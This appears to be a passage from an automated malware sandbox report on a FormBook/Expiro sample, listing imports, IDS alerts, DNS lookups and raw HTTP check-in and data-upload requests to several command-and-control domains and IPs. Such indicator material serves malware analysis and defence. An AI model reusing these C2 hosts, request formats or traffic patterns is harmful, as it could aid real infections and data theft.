                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-12-10T17:59:06.883022+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.74969954.244.188.17780TCP
                                                      2024-12-10T18:00:10.940466+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749817217.70.184.5080TCP
                                                      2024-12-10T18:00:28.160763+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749857154.23.184.20780TCP
                                                      2024-12-10T18:00:30.848420+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749863154.23.184.20780TCP
                                                      2024-12-10T18:00:33.520193+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749870154.23.184.20780TCP
                                                      2024-12-10T18:00:36.220714+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749876154.23.184.20780TCP
                                                      2024-12-10T18:00:43.692594+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74989638.165.29.23480TCP
                                                      2024-12-10T18:00:46.368010+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74990238.165.29.23480TCP
                                                      2024-12-10T18:00:49.020270+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74990838.165.29.23480TCP
                                                      2024-12-10T18:00:52.084329+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74991338.165.29.23480TCP
                                                      2024-12-10T18:00:58.856713+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74993213.248.169.4880TCP
                                                      2024-12-10T18:01:01.616313+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74993813.248.169.4880TCP
                                                      2024-12-10T18:01:04.487555+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74994413.248.169.4880TCP
                                                      2024-12-10T18:01:07.032477+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74995213.248.169.4880TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 10, 2024 17:59:06.335237980 CET4969980192.168.2.754.244.188.177
                                                      Dec 10, 2024 17:59:06.454767942 CET804969954.244.188.177192.168.2.7
                                                      Dec 10, 2024 17:59:06.454878092 CET4969980192.168.2.754.244.188.177
                                                      Dec 10, 2024 17:59:06.455642939 CET4969980192.168.2.754.244.188.177
                                                      Dec 10, 2024 17:59:06.455667973 CET4969980192.168.2.754.244.188.177
                                                      Dec 10, 2024 17:59:06.575026989 CET804969954.244.188.177192.168.2.7
                                                      Dec 10, 2024 17:59:06.575100899 CET804969954.244.188.177192.168.2.7
                                                      Dec 10, 2024 17:59:06.883022070 CET4969980192.168.2.754.244.188.177
                                                      Dec 10, 2024 18:00:09.566083908 CET4981780192.168.2.7217.70.184.50
                                                      Dec 10, 2024 18:00:09.690753937 CET8049817217.70.184.50192.168.2.7
                                                      Dec 10, 2024 18:00:09.690975904 CET4981780192.168.2.7217.70.184.50
                                                      Dec 10, 2024 18:00:09.904100895 CET4981780192.168.2.7217.70.184.50
                                                      Dec 10, 2024 18:00:10.024513006 CET8049817217.70.184.50192.168.2.7
                                                      Dec 10, 2024 18:00:10.940108061 CET8049817217.70.184.50192.168.2.7
                                                      Dec 10, 2024 18:00:10.940170050 CET8049817217.70.184.50192.168.2.7
                                                      Dec 10, 2024 18:00:10.940179110 CET8049817217.70.184.50192.168.2.7
                                                      Dec 10, 2024 18:00:10.940330029 CET8049817217.70.184.50192.168.2.7
                                                      Dec 10, 2024 18:00:10.940465927 CET4981780192.168.2.7217.70.184.50
                                                      Dec 10, 2024 18:00:10.940465927 CET4981780192.168.2.7217.70.184.50
                                                      Dec 10, 2024 18:00:10.945627928 CET4981780192.168.2.7217.70.184.50
                                                      Dec 10, 2024 18:00:11.066864014 CET8049817217.70.184.50192.168.2.7
                                                      Dec 10, 2024 18:00:26.517240047 CET4985780192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:26.636739969 CET8049857154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:26.636828899 CET4985780192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:26.650825977 CET4985780192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:26.770675898 CET8049857154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:28.160763025 CET4985780192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:28.216721058 CET8049857154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:28.216839075 CET8049857154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:28.216844082 CET4985780192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:28.216902018 CET4985780192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:28.280249119 CET8049857154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:28.280361891 CET4985780192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:29.203121901 CET4986380192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:29.323152065 CET8049863154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:29.323318958 CET4986380192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:29.339118958 CET4986380192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:29.604101896 CET8049863154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:30.848419905 CET4986380192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:30.981503010 CET8049863154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:30.981632948 CET4986380192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:31.868355989 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:31.991113901 CET8049870154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:31.991319895 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:32.005245924 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:32.124752045 CET8049870154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:32.124764919 CET8049870154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:33.520193100 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:33.549079895 CET8049870154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:33.549180984 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:33.549621105 CET8049870154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:33.549690008 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:33.646245956 CET8049870154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:33.646310091 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:34.538727045 CET4987680192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:34.660120010 CET8049876154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:34.660207033 CET4987680192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:34.669547081 CET4987680192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:34.795723915 CET8049876154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:36.220484018 CET8049876154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:36.220642090 CET8049876154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:36.220714092 CET4987680192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:36.223527908 CET4987680192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:36.343091965 CET8049876154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:42.043261051 CET4989680192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:42.162997961 CET804989638.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:42.163259029 CET4989680192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:42.177238941 CET4989680192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:42.296601057 CET804989638.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:43.692594051 CET4989680192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:43.812557936 CET804989638.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:43.812695026 CET4989680192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:44.710859060 CET4990280192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:44.830223083 CET804990238.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:44.830378056 CET4990280192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:44.844358921 CET4990280192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:44.963879108 CET804990238.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:46.368010044 CET4990280192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:46.490641117 CET804990238.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:46.490731955 CET4990280192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:47.382929087 CET4990880192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:47.502948999 CET804990838.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:47.503062963 CET4990880192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:47.517285109 CET4990880192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:47.636723042 CET804990838.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:47.637093067 CET804990838.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:49.020270109 CET4990880192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:49.140840054 CET804990838.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:49.141087055 CET4990880192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:50.053884983 CET4991380192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:50.176579952 CET804991338.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:50.176657915 CET4991380192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:50.358683109 CET4991380192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:50.484970093 CET804991338.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:52.084012032 CET804991338.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:52.084130049 CET804991338.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:52.084328890 CET4991380192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:52.087116003 CET4991380192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:52.206809998 CET804991338.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:57.632730007 CET4993280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:00:57.752135992 CET804993213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:00:57.752310038 CET4993280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:00:57.765922070 CET4993280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:00:57.885349989 CET804993213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:00:58.856128931 CET804993213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:00:58.856666088 CET804993213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:00:58.856713057 CET4993280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:00:59.275589943 CET4993280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:00.289455891 CET4993880192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:00.408735037 CET804993813.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:00.409003973 CET4993880192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:00.422977924 CET4993880192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:00.542289019 CET804993813.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:01.615715027 CET804993813.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:01.616136074 CET804993813.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:01.616312981 CET4993880192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:01.926419020 CET4993880192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:03.135843039 CET4994480192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:03.255279064 CET804994413.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:03.255697966 CET4994480192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:03.276416063 CET4994480192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:03.396289110 CET804994413.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:03.396322966 CET804994413.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:04.487437010 CET804994413.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:04.487477064 CET804994413.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:04.487555027 CET4994480192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:04.785788059 CET4994480192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:05.806052923 CET4995280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:05.927270889 CET804995213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:05.927422047 CET4995280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:05.939208031 CET4995280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:06.058717966 CET804995213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:07.031958103 CET804995213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:07.032324076 CET804995213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:07.032476902 CET4995280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:07.035036087 CET4995280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:07.155754089 CET804995213.248.169.48192.168.2.7

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 10, 2024 17:59:04.149418116 CET6174753192.168.2.71.1.1.1
                                                      Dec 10, 2024 17:59:04.727219105 CET53617471.1.1.1192.168.2.7
                                                      Dec 10, 2024 18:00:08.518945932 CET6249953192.168.2.71.1.1.1
                                                      Dec 10, 2024 18:00:09.458877087 CET53624991.1.1.1192.168.2.7
                                                      Dec 10, 2024 18:00:25.992430925 CET5197153192.168.2.71.1.1.1
                                                      Dec 10, 2024 18:00:26.514139891 CET53519711.1.1.1192.168.2.7
                                                      Dec 10, 2024 18:00:41.242650032 CET5113153192.168.2.71.1.1.1
                                                      Dec 10, 2024 18:00:42.040621996 CET53511311.1.1.1192.168.2.7
                                                      Dec 10, 2024 18:00:57.101861000 CET6028753192.168.2.71.1.1.1
                                                      Dec 10, 2024 18:00:57.629827023 CET53602871.1.1.1192.168.2.7

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 10, 2024 17:59:04.149418116 CET192.168.2.71.1.1.10xf434Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                      Dec 10, 2024 18:00:08.518945932 CET192.168.2.71.1.1.10xe3c7Standard query (0)www.sunnyz.storeA (IP address)IN (0x0001)false
                                                      Dec 10, 2024 18:00:25.992430925 CET192.168.2.71.1.1.10x54c4Standard query (0)www.d48dk.topA (IP address)IN (0x0001)false
                                                      Dec 10, 2024 18:00:41.242650032 CET192.168.2.71.1.1.10x207fStandard query (0)www.8312zcksnu.bondA (IP address)IN (0x0001)false
                                                      Dec 10, 2024 18:00:57.101861000 CET192.168.2.71.1.1.10xbdaStandard query (0)www.snyp.shopA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 10, 2024 17:59:04.727219105 CET1.1.1.1192.168.2.70xf434No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                      Dec 10, 2024 18:00:09.458877087 CET1.1.1.1192.168.2.70xe3c7No error (0)www.sunnyz.storewebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                      Dec 10, 2024 18:00:09.458877087 CET1.1.1.1192.168.2.70xe3c7No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                      Dec 10, 2024 18:00:26.514139891 CET1.1.1.1192.168.2.70x54c4No error (0)www.d48dk.topd48dk.topCNAME (Canonical name)IN (0x0001)false
                                                      Dec 10, 2024 18:00:26.514139891 CET1.1.1.1192.168.2.70x54c4No error (0)d48dk.top154.23.184.207A (IP address)IN (0x0001)false
                                                      Dec 10, 2024 18:00:42.040621996 CET1.1.1.1192.168.2.70x207fNo error (0)www.8312zcksnu.bond38.165.29.234A (IP address)IN (0x0001)false
                                                      Dec 10, 2024 18:00:57.629827023 CET1.1.1.1192.168.2.70xbdaNo error (0)www.snyp.shop13.248.169.48A (IP address)IN (0x0001)false
                                                      Dec 10, 2024 18:00:57.629827023 CET1.1.1.1192.168.2.70xbdaNo error (0)www.snyp.shop76.223.54.146A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • pywolwnvd.biz
                                                      • www.sunnyz.store
                                                      • www.d48dk.top
                                                      • www.8312zcksnu.bond
                                                      • www.snyp.shop

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.74969954.244.188.177807252C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 17:59:06.455642939 CET350OUTPOST /usxsp HTTP/1.1
                                                      Cache-Control: no-cache
                                                      Connection: Keep-Alive
                                                      Pragma: no-cache
                                                      Host: pywolwnvd.biz
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                      Content-Length: 830
                                                      Dec 10, 2024 17:59:06.455667973 CET830OUTData Raw: bc 6a 7a ee d7 c1 c1 7d 32 03 00 00 8d 6c 80 7c dd 72 41 bf 15 a8 e3 9c 9d 06 33 bd 60 04 fa 25 10 fe 5b 08 32 17 e3 6c 73 32 12 f2 69 9f ee c0 6d 11 c0 83 e3 56 52 f7 42 0c 9c e6 ad 57 c2 64 9b 23 16 58 eb 06 61 3d 73 8e ad 14 26 f7 ba 7f 74 17
                                                      Data Ascii: jz}2l|rA3`%[2ls2imVRBWd#Xa=s&t7mYmkHtaz$l{.s yk1`~t= {]a{;bM%cJA8v&L?52*&bd13:h7*^\1;~'Pg^-5?K/!@U]D]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.749817217.70.184.5080564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:00:09.904100895 CET535OUTGET /px6j/?PNE=e0RPRf4HVNE&66Sxjp=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKLb8lxYxVUxpwQ/Of0rti0wTIxJq6JAsDgXxJoFbzTbGnD1j7Uz133QdH HTTP/1.1
                                                      Host: www.sunnyz.store
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Dec 10, 2024 18:00:10.940108061 CET1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 10 Dec 2024 17:00:10 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Content-Security-Policy: default-src 'self'; script-src 'nonce-d01ed5c76b904f43bcaad454c783f094';
                                                      Vary: Accept-Language
                                                      Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 64 30 31 65 64 35 63 37 36 62 39 30 34 66 34 33 62 63 61 61 64 34 35 34 63 37 38 33 66 30 39 34 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                      Data Ascii: 91c<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-d01ed5c76b904f43bcaad454c783f094';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>sunnyz.store</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class
                                                      Dec 10, 2024 18:00:10.940170050 CET1236INData Raw: 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e
                                                      Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
                                                      Dec 10, 2024 18:00:10.940179110 CET160INData Raw: 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c 29 20 2b 20 27
                                                      Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.749857154.23.184.20780564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:00:26.650825977 CET783OUTPOST /9ffw/ HTTP/1.1
                                                      Host: www.d48dk.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.d48dk.top
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 219
                                                      Referer: http://www.d48dk.top/9ffw/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 4a 63 30 6c 4e 53 4f 49 4c 5a 62 6c 7a 6b 49 2f 57 46 46 33 4d 45 6e 78 63 57 73 49 54 58 61 73 75 68 4a 36 68 4e 4f 57 71 61 36 50 6f 50 49 6d 72 71 49 72 32 70 4d 51 51 74 56 49 43 59 76 30 42 77 38 55 2f 78 68 62 32 6d 49 75 5a 48 73 65 77 6e 75 36 74 6e 31 61 68 69 75 63 52 2b 32 50 51 66 63 4e 69 65 53 2f 31 51 2b 30 75 32 62 38 47 39 6b 6a 43 4b 73 78 33 67 6c 55 77 79 56 50 74 64 6f 54 75 72 62 67 41 56 55 31 58 75 79 38 61 57 34 5a 38 75 6c 77 66 6a 30 4d 4f 5a 48 6a 6e 31 39 35 4c 78 65 68 6c 49 47 63 57 2b 4d 55 4b 37 79 45 70 35 4a 75 41 2b 4a 73 37 4a 78 6a 4a 55 4c 48 51 3d 3d
                                                      Data Ascii: 66Sxjp=gCyAac3FM9KhZJc0lNSOILZblzkI/WFF3MEnxcWsITXasuhJ6hNOWqa6PoPImrqIr2pMQQtVICYv0Bw8U/xhb2mIuZHsewnu6tn1ahiucR+2PQfcNieS/1Q+0u2b8G9kjCKsx3glUwyVPtdoTurbgAVU1Xuy8aW4Z8ulwfj0MOZHjn195LxehlIGcW+MUK7yEp5JuA+Js7JxjJULHQ==
                                                      Dec 10, 2024 18:00:28.216721058 CET302INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 10 Dec 2024 17:00:27 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 138
                                                      Connection: close
                                                      ETag: "66927002-8a"
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.749863154.23.184.20780564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:00:29.339118958 CET803OUTPOST /9ffw/ HTTP/1.1
                                                      Host: www.d48dk.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.d48dk.top
